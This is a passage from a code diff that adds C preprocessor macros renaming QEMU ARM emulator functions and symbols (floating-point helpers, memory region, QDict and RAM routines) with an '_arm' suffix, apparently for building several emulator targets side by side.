helper_uhsub8_arm +#define helper_uhsubaddx helper_uhsubaddx_arm +#define helper_uqadd16 helper_uqadd16_arm +#define helper_uqadd8 helper_uqadd8_arm +#define helper_uqaddsubx helper_uqaddsubx_arm +#define helper_uqsub16 helper_uqsub16_arm +#define helper_uqsub8 helper_uqsub8_arm +#define helper_uqsubaddx helper_uqsubaddx_arm +#define helper_usad8 helper_usad8_arm +#define helper_usat helper_usat_arm +#define helper_usat16 helper_usat16_arm +#define helper_usub16 helper_usub16_arm +#define helper_usub8 helper_usub8_arm +#define helper_usubaddx helper_usubaddx_arm +#define helper_uxtb16 helper_uxtb16_arm +#define helper_v7m_mrs helper_v7m_mrs_arm +#define helper_v7m_msr helper_v7m_msr_arm +#define helper_vfp_absd helper_vfp_absd_arm +#define helper_vfp_abss helper_vfp_abss_arm +#define helper_vfp_addd helper_vfp_addd_arm +#define helper_vfp_adds helper_vfp_adds_arm +#define helper_vfp_cmpd helper_vfp_cmpd_arm +#define helper_vfp_cmped helper_vfp_cmped_arm +#define helper_vfp_cmpes helper_vfp_cmpes_arm +#define helper_vfp_cmps helper_vfp_cmps_arm +#define helper_vfp_divd helper_vfp_divd_arm +#define helper_vfp_divs helper_vfp_divs_arm +#define helper_vfp_fcvtds helper_vfp_fcvtds_arm +#define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_arm +#define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_arm +#define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_arm +#define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_arm +#define helper_vfp_fcvtsd helper_vfp_fcvtsd_arm +#define helper_vfp_get_fpscr helper_vfp_get_fpscr_arm +#define helper_vfp_maxd helper_vfp_maxd_arm +#define helper_vfp_maxnumd helper_vfp_maxnumd_arm +#define helper_vfp_maxnums helper_vfp_maxnums_arm +#define helper_vfp_maxs helper_vfp_maxs_arm +#define helper_vfp_mind helper_vfp_mind_arm +#define helper_vfp_minnumd helper_vfp_minnumd_arm +#define helper_vfp_minnums helper_vfp_minnums_arm +#define helper_vfp_mins helper_vfp_mins_arm +#define helper_vfp_muladdd helper_vfp_muladdd_arm +#define helper_vfp_muladds helper_vfp_muladds_arm +#define helper_vfp_muld helper_vfp_muld_arm +#define helper_vfp_muls helper_vfp_muls_arm +#define helper_vfp_negd helper_vfp_negd_arm +#define helper_vfp_negs helper_vfp_negs_arm +#define helper_vfp_set_fpscr helper_vfp_set_fpscr_arm +#define helper_vfp_shtod helper_vfp_shtod_arm +#define helper_vfp_shtos helper_vfp_shtos_arm +#define helper_vfp_sitod helper_vfp_sitod_arm +#define helper_vfp_sitos helper_vfp_sitos_arm +#define helper_vfp_sltod helper_vfp_sltod_arm +#define helper_vfp_sltos helper_vfp_sltos_arm +#define helper_vfp_sqrtd helper_vfp_sqrtd_arm +#define helper_vfp_sqrts helper_vfp_sqrts_arm +#define helper_vfp_sqtod helper_vfp_sqtod_arm +#define helper_vfp_sqtos helper_vfp_sqtos_arm +#define helper_vfp_subd helper_vfp_subd_arm +#define helper_vfp_subs helper_vfp_subs_arm +#define helper_vfp_toshd helper_vfp_toshd_arm +#define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_arm +#define helper_vfp_toshs helper_vfp_toshs_arm +#define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_arm +#define helper_vfp_tosid helper_vfp_tosid_arm +#define helper_vfp_tosis helper_vfp_tosis_arm +#define helper_vfp_tosizd helper_vfp_tosizd_arm +#define helper_vfp_tosizs helper_vfp_tosizs_arm +#define helper_vfp_tosld helper_vfp_tosld_arm +#define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_arm +#define helper_vfp_tosls helper_vfp_tosls_arm +#define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_arm +#define helper_vfp_tosqd helper_vfp_tosqd_arm +#define helper_vfp_tosqs helper_vfp_tosqs_arm +#define helper_vfp_touhd helper_vfp_touhd_arm +#define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_arm +#define helper_vfp_touhs helper_vfp_touhs_arm +#define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_arm +#define helper_vfp_touid helper_vfp_touid_arm +#define helper_vfp_touis helper_vfp_touis_arm +#define helper_vfp_touizd helper_vfp_touizd_arm +#define helper_vfp_touizs helper_vfp_touizs_arm +#define helper_vfp_tould helper_vfp_tould_arm +#define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_arm +#define helper_vfp_touls helper_vfp_touls_arm +#define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_arm +#define helper_vfp_touqd helper_vfp_touqd_arm +#define helper_vfp_touqs helper_vfp_touqs_arm +#define helper_vfp_uhtod helper_vfp_uhtod_arm +#define helper_vfp_uhtos helper_vfp_uhtos_arm +#define helper_vfp_uitod helper_vfp_uitod_arm +#define helper_vfp_uitos helper_vfp_uitos_arm +#define helper_vfp_ultod helper_vfp_ultod_arm +#define helper_vfp_ultos helper_vfp_ultos_arm +#define helper_vfp_uqtod helper_vfp_uqtod_arm +#define helper_vfp_uqtos helper_vfp_uqtos_arm +#define helper_wfe helper_wfe_arm +#define helper_wfi helper_wfi_arm +#define hex2decimal hex2decimal_arm +#define hw_breakpoint_update hw_breakpoint_update_arm +#define hw_breakpoint_update_all hw_breakpoint_update_all_arm +#define hw_watchpoint_update hw_watchpoint_update_arm +#define hw_watchpoint_update_all hw_watchpoint_update_all_arm +#define _init _init_arm +#define init_cpreg_list init_cpreg_list_arm +#define init_lists init_lists_arm +#define input_type_enum input_type_enum_arm +#define int128_2_64 int128_2_64_arm +#define int128_add int128_add_arm +#define int128_addto int128_addto_arm +#define int128_and int128_and_arm +#define int128_eq int128_eq_arm +#define int128_ge int128_ge_arm +#define int128_get64 int128_get64_arm +#define int128_gt int128_gt_arm +#define int128_le int128_le_arm +#define int128_lt int128_lt_arm +#define int128_make64 int128_make64_arm +#define int128_max int128_max_arm +#define int128_min int128_min_arm +#define int128_ne int128_ne_arm +#define int128_neg int128_neg_arm +#define int128_nz int128_nz_arm +#define int128_rshift int128_rshift_arm +#define int128_sub int128_sub_arm +#define int128_subfrom int128_subfrom_arm +#define int128_zero int128_zero_arm +#define int16_to_float32 int16_to_float32_arm +#define int16_to_float64 int16_to_float64_arm +#define int32_to_float128 int32_to_float128_arm +#define int32_to_float32 int32_to_float32_arm +#define int32_to_float64 int32_to_float64_arm +#define int32_to_floatx80 int32_to_floatx80_arm +#define int64_to_float128 int64_to_float128_arm +#define int64_to_float32 int64_to_float32_arm +#define int64_to_float64 int64_to_float64_arm +#define int64_to_floatx80 int64_to_floatx80_arm +#define invalidate_and_set_dirty invalidate_and_set_dirty_arm +#define invalidate_page_bitmap invalidate_page_bitmap_arm +#define io_mem_read io_mem_read_arm +#define io_mem_write io_mem_write_arm +#define io_readb io_readb_arm +#define io_readl io_readl_arm +#define io_readq io_readq_arm +#define io_readw io_readw_arm +#define iotlb_to_region iotlb_to_region_arm +#define io_writeb io_writeb_arm +#define io_writel io_writel_arm +#define io_writeq io_writeq_arm +#define io_writew io_writew_arm +#define is_a64 is_a64_arm +#define is_help_option is_help_option_arm +#define isr_read isr_read_arm +#define is_valid_option_list is_valid_option_list_arm +#define iwmmxt_load_creg iwmmxt_load_creg_arm +#define iwmmxt_load_reg iwmmxt_load_reg_arm +#define iwmmxt_store_creg iwmmxt_store_creg_arm +#define iwmmxt_store_reg iwmmxt_store_reg_arm +#define __jit_debug_descriptor __jit_debug_descriptor_arm +#define __jit_debug_register_code __jit_debug_register_code_arm +#define kvm_to_cpreg_id kvm_to_cpreg_id_arm +#define last_ram_offset last_ram_offset_arm +#define ldl_be_p ldl_be_p_arm +#define ldl_be_phys ldl_be_phys_arm +#define ldl_he_p ldl_he_p_arm +#define ldl_le_p ldl_le_p_arm +#define ldl_le_phys ldl_le_phys_arm +#define ldl_phys ldl_phys_arm +#define ldl_phys_internal ldl_phys_internal_arm +#define ldq_be_p ldq_be_p_arm +#define ldq_be_phys ldq_be_phys_arm +#define ldq_he_p ldq_he_p_arm +#define ldq_le_p ldq_le_p_arm +#define ldq_le_phys ldq_le_phys_arm +#define ldq_phys ldq_phys_arm +#define ldq_phys_internal ldq_phys_internal_arm +#define ldst_name ldst_name_arm +#define ldub_p ldub_p_arm +#define ldub_phys ldub_phys_arm +#define lduw_be_p lduw_be_p_arm +#define lduw_be_phys lduw_be_phys_arm +#define lduw_he_p lduw_he_p_arm +#define lduw_le_p lduw_le_p_arm +#define lduw_le_phys lduw_le_phys_arm +#define lduw_phys lduw_phys_arm +#define lduw_phys_internal lduw_phys_internal_arm +#define le128 le128_arm +#define linked_bp_matches linked_bp_matches_arm +#define listener_add_address_space listener_add_address_space_arm +#define load_cpu_offset load_cpu_offset_arm +#define load_reg load_reg_arm +#define load_reg_var load_reg_var_arm +#define log_cpu_state log_cpu_state_arm +#define lpae_cp_reginfo lpae_cp_reginfo_arm +#define lt128 lt128_arm +#define machine_class_init machine_class_init_arm +#define machine_finalize machine_finalize_arm +#define machine_info machine_info_arm +#define machine_initfn machine_initfn_arm +#define machine_register_types machine_register_types_arm +#define machvirt_init machvirt_init_arm +#define machvirt_machine_init machvirt_machine_init_arm +#define maj maj_arm +#define mapping_conflict mapping_conflict_arm +#define mapping_contiguous mapping_contiguous_arm +#define mapping_have_same_region mapping_have_same_region_arm +#define mapping_merge mapping_merge_arm +#define mem_add mem_add_arm +#define mem_begin mem_begin_arm +#define mem_commit mem_commit_arm +#define memory_access_is_direct memory_access_is_direct_arm +#define memory_access_size memory_access_size_arm +#define memory_init memory_init_arm +#define memory_listener_match memory_listener_match_arm +#define memory_listener_register memory_listener_register_arm +#define memory_listener_unregister memory_listener_unregister_arm +#define memory_map_init memory_map_init_arm +#define memory_mapping_filter memory_mapping_filter_arm +#define memory_mapping_list_add_mapping_sorted memory_mapping_list_add_mapping_sorted_arm +#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_arm +#define memory_mapping_list_free memory_mapping_list_free_arm +#define memory_mapping_list_init memory_mapping_list_init_arm +#define memory_region_access_valid memory_region_access_valid_arm +#define memory_region_add_subregion memory_region_add_subregion_arm +#define memory_region_add_subregion_common memory_region_add_subregion_common_arm +#define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_arm +#define memory_region_big_endian memory_region_big_endian_arm +#define memory_region_clear_pending memory_region_clear_pending_arm +#define memory_region_del_subregion memory_region_del_subregion_arm +#define memory_region_destructor_alias memory_region_destructor_alias_arm +#define memory_region_destructor_none memory_region_destructor_none_arm +#define memory_region_destructor_ram memory_region_destructor_ram_arm +#define memory_region_destructor_ram_from_ptr memory_region_destructor_ram_from_ptr_arm +#define memory_region_dispatch_read memory_region_dispatch_read_arm +#define memory_region_dispatch_read1 memory_region_dispatch_read1_arm +#define memory_region_dispatch_write memory_region_dispatch_write_arm +#define memory_region_escape_name memory_region_escape_name_arm +#define memory_region_finalize memory_region_finalize_arm +#define memory_region_find memory_region_find_arm +#define memory_region_get_addr memory_region_get_addr_arm +#define memory_region_get_alignment memory_region_get_alignment_arm +#define memory_region_get_container memory_region_get_container_arm +#define memory_region_get_fd memory_region_get_fd_arm +#define memory_region_get_may_overlap memory_region_get_may_overlap_arm +#define memory_region_get_priority memory_region_get_priority_arm +#define memory_region_get_ram_addr memory_region_get_ram_addr_arm +#define memory_region_get_ram_ptr memory_region_get_ram_ptr_arm +#define memory_region_get_size memory_region_get_size_arm +#define memory_region_info memory_region_info_arm +#define memory_region_init memory_region_init_arm +#define memory_region_init_alias memory_region_init_alias_arm +#define memory_region_initfn memory_region_initfn_arm +#define memory_region_init_io memory_region_init_io_arm +#define memory_region_init_ram memory_region_init_ram_arm +#define memory_region_init_ram_ptr memory_region_init_ram_ptr_arm +#define memory_region_init_reservation memory_region_init_reservation_arm +#define memory_region_is_iommu memory_region_is_iommu_arm +#define memory_region_is_logging memory_region_is_logging_arm +#define memory_region_is_mapped memory_region_is_mapped_arm +#define memory_region_is_ram memory_region_is_ram_arm +#define memory_region_is_rom memory_region_is_rom_arm +#define memory_region_is_romd memory_region_is_romd_arm +#define memory_region_is_skip_dump memory_region_is_skip_dump_arm +#define memory_region_is_unassigned memory_region_is_unassigned_arm +#define memory_region_name memory_region_name_arm +#define memory_region_need_escape memory_region_need_escape_arm +#define memory_region_oldmmio_read_accessor memory_region_oldmmio_read_accessor_arm +#define memory_region_oldmmio_write_accessor memory_region_oldmmio_write_accessor_arm +#define memory_region_present memory_region_present_arm +#define memory_region_read_accessor memory_region_read_accessor_arm +#define memory_region_readd_subregion memory_region_readd_subregion_arm +#define memory_region_ref memory_region_ref_arm +#define memory_region_resolve_container memory_region_resolve_container_arm +#define memory_region_rom_device_set_romd memory_region_rom_device_set_romd_arm +#define memory_region_section_get_iotlb memory_region_section_get_iotlb_arm +#define memory_region_set_address memory_region_set_address_arm +#define memory_region_set_alias_offset memory_region_set_alias_offset_arm +#define memory_region_set_enabled memory_region_set_enabled_arm +#define memory_region_set_readonly memory_region_set_readonly_arm +#define memory_region_set_skip_dump memory_region_set_skip_dump_arm +#define memory_region_size memory_region_size_arm +#define memory_region_to_address_space memory_region_to_address_space_arm +#define memory_region_transaction_begin memory_region_transaction_begin_arm +#define memory_region_transaction_commit memory_region_transaction_commit_arm +#define memory_region_unref memory_region_unref_arm +#define memory_region_update_container_subregions memory_region_update_container_subregions_arm +#define memory_region_write_accessor memory_region_write_accessor_arm +#define memory_region_wrong_endianness memory_region_wrong_endianness_arm +#define memory_try_enable_merging memory_try_enable_merging_arm +#define module_call_init module_call_init_arm +#define module_load module_load_arm +#define mpidr_cp_reginfo mpidr_cp_reginfo_arm +#define mpidr_read mpidr_read_arm +#define msr_mask msr_mask_arm +#define mul128By64To192 mul128By64To192_arm +#define mul128To256 mul128To256_arm +#define mul64To128 mul64To128_arm +#define muldiv64 muldiv64_arm +#define neon_2rm_is_float_op neon_2rm_is_float_op_arm +#define neon_2rm_sizes neon_2rm_sizes_arm +#define neon_3r_sizes neon_3r_sizes_arm +#define neon_get_scalar neon_get_scalar_arm +#define neon_load_reg neon_load_reg_arm +#define neon_load_reg64 neon_load_reg64_arm +#define neon_load_scratch neon_load_scratch_arm +#define neon_ls_element_type neon_ls_element_type_arm +#define neon_reg_offset neon_reg_offset_arm +#define neon_store_reg neon_store_reg_arm +#define neon_store_reg64 neon_store_reg64_arm +#define neon_store_scratch neon_store_scratch_arm +#define new_ldst_label new_ldst_label_arm +#define next_list next_list_arm +#define normalizeFloat128Subnormal normalizeFloat128Subnormal_arm +#define normalizeFloat16Subnormal normalizeFloat16Subnormal_arm +#define normalizeFloat32Subnormal normalizeFloat32Subnormal_arm +#define normalizeFloat64Subnormal normalizeFloat64Subnormal_arm +#define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_arm +#define normalizeRoundAndPackFloat128 normalizeRoundAndPackFloat128_arm +#define normalizeRoundAndPackFloat32 normalizeRoundAndPackFloat32_arm +#define normalizeRoundAndPackFloat64 normalizeRoundAndPackFloat64_arm +#define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_arm +#define not_v6_cp_reginfo not_v6_cp_reginfo_arm +#define not_v7_cp_reginfo not_v7_cp_reginfo_arm +#define not_v8_cp_reginfo not_v8_cp_reginfo_arm +#define object_child_foreach object_child_foreach_arm +#define object_class_foreach object_class_foreach_arm +#define object_class_foreach_tramp object_class_foreach_tramp_arm +#define object_class_get_list object_class_get_list_arm +#define object_class_get_list_tramp object_class_get_list_tramp_arm +#define object_class_get_parent object_class_get_parent_arm +#define object_deinit object_deinit_arm +#define object_dynamic_cast object_dynamic_cast_arm +#define object_finalize object_finalize_arm +#define object_finalize_child_property object_finalize_child_property_arm +#define object_get_child_property object_get_child_property_arm +#define object_get_link_property object_get_link_property_arm +#define object_get_root object_get_root_arm +#define object_initialize_with_type object_initialize_with_type_arm +#define object_init_with_type object_init_with_type_arm +#define object_instance_init object_instance_init_arm +#define object_new_with_type object_new_with_type_arm +#define object_post_init_with_type object_post_init_with_type_arm +#define object_property_add_alias object_property_add_alias_arm +#define object_property_add_link object_property_add_link_arm +#define object_property_add_uint16_ptr object_property_add_uint16_ptr_arm +#define object_property_add_uint32_ptr object_property_add_uint32_ptr_arm +#define object_property_add_uint64_ptr object_property_add_uint64_ptr_arm +#define object_property_add_uint8_ptr object_property_add_uint8_ptr_arm +#define object_property_allow_set_link object_property_allow_set_link_arm +#define object_property_del object_property_del_arm +#define object_property_del_all object_property_del_all_arm +#define object_property_find object_property_find_arm +#define object_property_get object_property_get_arm +#define object_property_get_bool object_property_get_bool_arm +#define object_property_get_int object_property_get_int_arm +#define object_property_get_link object_property_get_link_arm +#define object_property_get_qobject object_property_get_qobject_arm +#define object_property_get_str object_property_get_str_arm +#define object_property_get_type object_property_get_type_arm +#define object_property_is_child object_property_is_child_arm +#define object_property_set object_property_set_arm +#define object_property_set_description object_property_set_description_arm +#define object_property_set_link object_property_set_link_arm +#define object_property_set_qobject object_property_set_qobject_arm +#define object_release_link_property object_release_link_property_arm +#define object_resolve_abs_path object_resolve_abs_path_arm +#define object_resolve_child_property object_resolve_child_property_arm +#define object_resolve_link object_resolve_link_arm +#define object_resolve_link_property object_resolve_link_property_arm +#define object_resolve_partial_path object_resolve_partial_path_arm +#define object_resolve_path object_resolve_path_arm +#define object_resolve_path_component object_resolve_path_component_arm +#define object_resolve_path_type object_resolve_path_type_arm +#define object_set_link_property object_set_link_property_arm +#define object_unparent object_unparent_arm +#define omap_cachemaint_write omap_cachemaint_write_arm +#define omap_cp_reginfo omap_cp_reginfo_arm +#define omap_threadid_write omap_threadid_write_arm +#define omap_ticonfig_write omap_ticonfig_write_arm +#define omap_wfi_write omap_wfi_write_arm +#define op_bits op_bits_arm +#define open_modeflags open_modeflags_arm +#define op_to_mov op_to_mov_arm +#define op_to_movi op_to_movi_arm +#define output_type_enum output_type_enum_arm +#define packFloat128 packFloat128_arm +#define packFloat16 packFloat16_arm +#define packFloat32 packFloat32_arm +#define packFloat64 packFloat64_arm +#define packFloatx80 packFloatx80_arm +#define page_find page_find_arm +#define page_find_alloc page_find_alloc_arm +#define page_flush_tb page_flush_tb_arm +#define page_flush_tb_1 page_flush_tb_1_arm +#define page_init page_init_arm +#define page_size_init page_size_init_arm +#define par par_arm +#define parse_array parse_array_arm +#define parse_error parse_error_arm +#define parse_escape parse_escape_arm +#define parse_keyword parse_keyword_arm +#define parse_literal parse_literal_arm +#define parse_object parse_object_arm +#define parse_optional parse_optional_arm +#define parse_option_bool parse_option_bool_arm +#define parse_option_number parse_option_number_arm +#define parse_option_size parse_option_size_arm +#define parse_pair parse_pair_arm +#define parser_context_free parser_context_free_arm +#define parser_context_new parser_context_new_arm +#define parser_context_peek_token parser_context_peek_token_arm +#define parser_context_pop_token parser_context_pop_token_arm +#define parser_context_restore parser_context_restore_arm +#define parser_context_save parser_context_save_arm +#define parse_str parse_str_arm +#define parse_type_bool parse_type_bool_arm +#define parse_type_int parse_type_int_arm +#define parse_type_number parse_type_number_arm +#define parse_type_size parse_type_size_arm +#define parse_type_str parse_type_str_arm +#define parse_value parse_value_arm +#define par_write par_write_arm +#define patch_reloc patch_reloc_arm +#define phys_map_node_alloc phys_map_node_alloc_arm +#define phys_map_node_reserve phys_map_node_reserve_arm +#define phys_mem_alloc phys_mem_alloc_arm +#define phys_mem_set_alloc phys_mem_set_alloc_arm +#define phys_page_compact phys_page_compact_arm +#define phys_page_compact_all phys_page_compact_all_arm +#define phys_page_find phys_page_find_arm +#define phys_page_set phys_page_set_arm +#define phys_page_set_level phys_page_set_level_arm +#define phys_section_add phys_section_add_arm +#define phys_section_destroy phys_section_destroy_arm +#define phys_sections_free phys_sections_free_arm +#define pickNaN pickNaN_arm +#define pickNaNMulAdd pickNaNMulAdd_arm +#define pmccfiltr_write pmccfiltr_write_arm +#define pmccntr_read pmccntr_read_arm +#define pmccntr_sync pmccntr_sync_arm +#define pmccntr_write pmccntr_write_arm +#define pmccntr_write32 pmccntr_write32_arm +#define pmcntenclr_write pmcntenclr_write_arm +#define pmcntenset_write pmcntenset_write_arm +#define pmcr_write pmcr_write_arm +#define pmintenclr_write pmintenclr_write_arm +#define pmintenset_write pmintenset_write_arm +#define pmovsr_write pmovsr_write_arm +#define pmreg_access pmreg_access_arm +#define pmsav5_cp_reginfo pmsav5_cp_reginfo_arm +#define pmsav5_data_ap_read pmsav5_data_ap_read_arm +#define pmsav5_data_ap_write pmsav5_data_ap_write_arm +#define pmsav5_insn_ap_read pmsav5_insn_ap_read_arm +#define pmsav5_insn_ap_write pmsav5_insn_ap_write_arm +#define pmuserenr_write pmuserenr_write_arm +#define pmxevtyper_write pmxevtyper_write_arm +#define print_type_bool print_type_bool_arm +#define print_type_int print_type_int_arm +#define print_type_number print_type_number_arm +#define print_type_size print_type_size_arm +#define print_type_str print_type_str_arm +#define propagateFloat128NaN propagateFloat128NaN_arm +#define propagateFloat32MulAddNaN propagateFloat32MulAddNaN_arm +#define propagateFloat32NaN propagateFloat32NaN_arm +#define propagateFloat64MulAddNaN propagateFloat64MulAddNaN_arm +#define propagateFloat64NaN propagateFloat64NaN_arm +#define propagateFloatx80NaN propagateFloatx80NaN_arm +#define property_get_alias property_get_alias_arm +#define property_get_bool property_get_bool_arm +#define property_get_str property_get_str_arm +#define property_get_uint16_ptr property_get_uint16_ptr_arm +#define property_get_uint32_ptr property_get_uint32_ptr_arm +#define property_get_uint64_ptr property_get_uint64_ptr_arm +#define property_get_uint8_ptr property_get_uint8_ptr_arm +#define property_release_alias property_release_alias_arm +#define property_release_bool property_release_bool_arm +#define property_release_str property_release_str_arm +#define property_resolve_alias property_resolve_alias_arm +#define property_set_alias property_set_alias_arm +#define property_set_bool property_set_bool_arm +#define property_set_str property_set_str_arm +#define pstate_read pstate_read_arm +#define pstate_write pstate_write_arm +#define pxa250_initfn pxa250_initfn_arm +#define pxa255_initfn pxa255_initfn_arm +#define pxa260_initfn pxa260_initfn_arm +#define pxa261_initfn pxa261_initfn_arm +#define pxa262_initfn pxa262_initfn_arm +#define pxa270a0_initfn pxa270a0_initfn_arm +#define pxa270a1_initfn pxa270a1_initfn_arm +#define pxa270b0_initfn pxa270b0_initfn_arm +#define pxa270b1_initfn pxa270b1_initfn_arm +#define pxa270c0_initfn pxa270c0_initfn_arm +#define pxa270c5_initfn pxa270c5_initfn_arm +#define qapi_dealloc_end_implicit_struct qapi_dealloc_end_implicit_struct_arm +#define qapi_dealloc_end_list qapi_dealloc_end_list_arm +#define qapi_dealloc_end_struct qapi_dealloc_end_struct_arm +#define qapi_dealloc_get_visitor qapi_dealloc_get_visitor_arm +#define qapi_dealloc_next_list qapi_dealloc_next_list_arm +#define qapi_dealloc_pop qapi_dealloc_pop_arm +#define qapi_dealloc_push qapi_dealloc_push_arm +#define qapi_dealloc_start_implicit_struct qapi_dealloc_start_implicit_struct_arm +#define qapi_dealloc_start_list qapi_dealloc_start_list_arm +#define qapi_dealloc_start_struct qapi_dealloc_start_struct_arm +#define qapi_dealloc_start_union qapi_dealloc_start_union_arm +#define qapi_dealloc_type_bool qapi_dealloc_type_bool_arm +#define qapi_dealloc_type_enum qapi_dealloc_type_enum_arm +#define qapi_dealloc_type_int qapi_dealloc_type_int_arm +#define qapi_dealloc_type_number qapi_dealloc_type_number_arm +#define qapi_dealloc_type_size qapi_dealloc_type_size_arm +#define qapi_dealloc_type_str qapi_dealloc_type_str_arm +#define qapi_dealloc_visitor_cleanup qapi_dealloc_visitor_cleanup_arm +#define qapi_dealloc_visitor_new qapi_dealloc_visitor_new_arm +#define qapi_free_boolList qapi_free_boolList_arm +#define qapi_free_ErrorClassList qapi_free_ErrorClassList_arm +#define qapi_free_int16List qapi_free_int16List_arm +#define qapi_free_int32List qapi_free_int32List_arm +#define qapi_free_int64List qapi_free_int64List_arm +#define qapi_free_int8List qapi_free_int8List_arm +#define qapi_free_intList qapi_free_intList_arm +#define qapi_free_numberList qapi_free_numberList_arm +#define qapi_free_strList qapi_free_strList_arm +#define qapi_free_uint16List qapi_free_uint16List_arm +#define qapi_free_uint32List qapi_free_uint32List_arm +#define qapi_free_uint64List qapi_free_uint64List_arm +#define qapi_free_uint8List qapi_free_uint8List_arm +#define qapi_free_X86CPUFeatureWordInfo qapi_free_X86CPUFeatureWordInfo_arm +#define qapi_free_X86CPUFeatureWordInfoList qapi_free_X86CPUFeatureWordInfoList_arm +#define qapi_free_X86CPURegister32List qapi_free_X86CPURegister32List_arm +#define qbool_destroy_obj qbool_destroy_obj_arm +#define qbool_from_int qbool_from_int_arm +#define qbool_get_int qbool_get_int_arm +#define qbool_type qbool_type_arm +#define qbus_create qbus_create_arm +#define qbus_create_inplace qbus_create_inplace_arm +#define qbus_finalize qbus_finalize_arm +#define qbus_initfn qbus_initfn_arm +#define qbus_realize qbus_realize_arm +#define qdev_create qdev_create_arm +#define qdev_get_type qdev_get_type_arm +#define qdev_register_types qdev_register_types_arm +#define qdev_set_parent_bus qdev_set_parent_bus_arm +#define qdev_try_create qdev_try_create_arm +#define qdict_add_key qdict_add_key_arm +#define qdict_array_split qdict_array_split_arm +#define qdict_clone_shallow qdict_clone_shallow_arm +#define qdict_del qdict_del_arm +#define qdict_destroy_obj qdict_destroy_obj_arm +#define qdict_entry_key qdict_entry_key_arm +#define qdict_entry_value qdict_entry_value_arm +#define qdict_extract_subqdict qdict_extract_subqdict_arm +#define qdict_find qdict_find_arm +#define qdict_first qdict_first_arm +#define qdict_flatten qdict_flatten_arm +#define qdict_flatten_qdict qdict_flatten_qdict_arm +#define qdict_flatten_qlist qdict_flatten_qlist_arm +#define qdict_get qdict_get_arm +#define qdict_get_bool qdict_get_bool_arm +#define qdict_get_double qdict_get_double_arm +#define qdict_get_int qdict_get_int_arm +#define qdict_get_obj qdict_get_obj_arm +#define qdict_get_qdict qdict_get_qdict_arm +#define qdict_get_qlist qdict_get_qlist_arm +#define qdict_get_str qdict_get_str_arm +#define qdict_get_try_bool qdict_get_try_bool_arm +#define qdict_get_try_int qdict_get_try_int_arm +#define qdict_get_try_str qdict_get_try_str_arm +#define qdict_haskey qdict_haskey_arm +#define qdict_has_prefixed_entries qdict_has_prefixed_entries_arm +#define qdict_iter qdict_iter_arm +#define qdict_join qdict_join_arm +#define qdict_new qdict_new_arm +#define qdict_next qdict_next_arm +#define qdict_next_entry qdict_next_entry_arm +#define qdict_put_obj qdict_put_obj_arm +#define qdict_size qdict_size_arm +#define qdict_type qdict_type_arm +#define qemu_clock_get_us qemu_clock_get_us_arm +#define qemu_clock_ptr qemu_clock_ptr_arm +#define qemu_clocks qemu_clocks_arm +#define qemu_get_cpu qemu_get_cpu_arm +#define qemu_get_guest_memory_mapping qemu_get_guest_memory_mapping_arm +#define qemu_get_guest_simple_memory_mapping qemu_get_guest_simple_memory_mapping_arm +#define qemu_get_ram_block qemu_get_ram_block_arm +#define qemu_get_ram_block_host_ptr qemu_get_ram_block_host_ptr_arm +#define qemu_get_ram_fd qemu_get_ram_fd_arm +#define qemu_get_ram_ptr qemu_get_ram_ptr_arm +#define qemu_host_page_mask qemu_host_page_mask_arm +#define qemu_host_page_size qemu_host_page_size_arm +#define qemu_init_vcpu qemu_init_vcpu_arm +#define qemu_ld_helpers qemu_ld_helpers_arm +#define qemu_log_close qemu_log_close_arm +#define qemu_log_enabled qemu_log_enabled_arm +#define qemu_log_flush qemu_log_flush_arm +#define qemu_loglevel_mask qemu_loglevel_mask_arm +#define qemu_log_vprintf qemu_log_vprintf_arm +#define qemu_oom_check qemu_oom_check_arm +#define qemu_parse_fd qemu_parse_fd_arm +#define qemu_ram_addr_from_host qemu_ram_addr_from_host_arm +#define qemu_ram_addr_from_host_nofail qemu_ram_addr_from_host_nofail_arm +#define qemu_ram_alloc qemu_ram_alloc_arm +#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_arm +#define qemu_ram_foreach_block qemu_ram_foreach_block_arm +#define qemu_ram_free qemu_ram_free_arm +#define qemu_ram_free_from_ptr qemu_ram_free_from_ptr_arm +#define qemu_ram_ptr_length qemu_ram_ptr_length_arm +#define qemu_ram_remap qemu_ram_remap_arm +#define qemu_ram_setup_dump qemu_ram_setup_dump_arm +#define qemu_ram_unset_idstr qemu_ram_unset_idstr_arm +#define qemu_real_host_page_size qemu_real_host_page_size_arm +#define qemu_st_helpers qemu_st_helpers_arm +#define qemu_tcg_init_vcpu qemu_tcg_init_vcpu_arm +#define qemu_try_memalign qemu_try_memalign_arm +#define qentry_destroy qentry_destroy_arm +#define qerror_human qerror_human_arm +#define qerror_report qerror_report_arm +#define qerror_report_err qerror_report_err_arm +#define qfloat_destroy_obj qfloat_destroy_obj_arm +#define qfloat_from_double qfloat_from_double_arm +#define qfloat_get_double qfloat_get_double_arm +#define qfloat_type qfloat_type_arm +#define qint_destroy_obj qint_destroy_obj_arm +#define qint_from_int qint_from_int_arm +#define qint_get_int qint_get_int_arm +#define qint_type qint_type_arm +#define qlist_append_obj qlist_append_obj_arm +#define qlist_copy qlist_copy_arm +#define qlist_copy_elem qlist_copy_elem_arm +#define qlist_destroy_obj qlist_destroy_obj_arm +#define qlist_empty qlist_empty_arm +#define qlist_entry_obj qlist_entry_obj_arm +#define qlist_first qlist_first_arm +#define qlist_iter qlist_iter_arm +#define qlist_new qlist_new_arm +#define qlist_next qlist_next_arm +#define qlist_peek qlist_peek_arm +#define qlist_pop qlist_pop_arm +#define qlist_size qlist_size_arm +#define qlist_size_iter qlist_size_iter_arm +#define qlist_type qlist_type_arm +#define 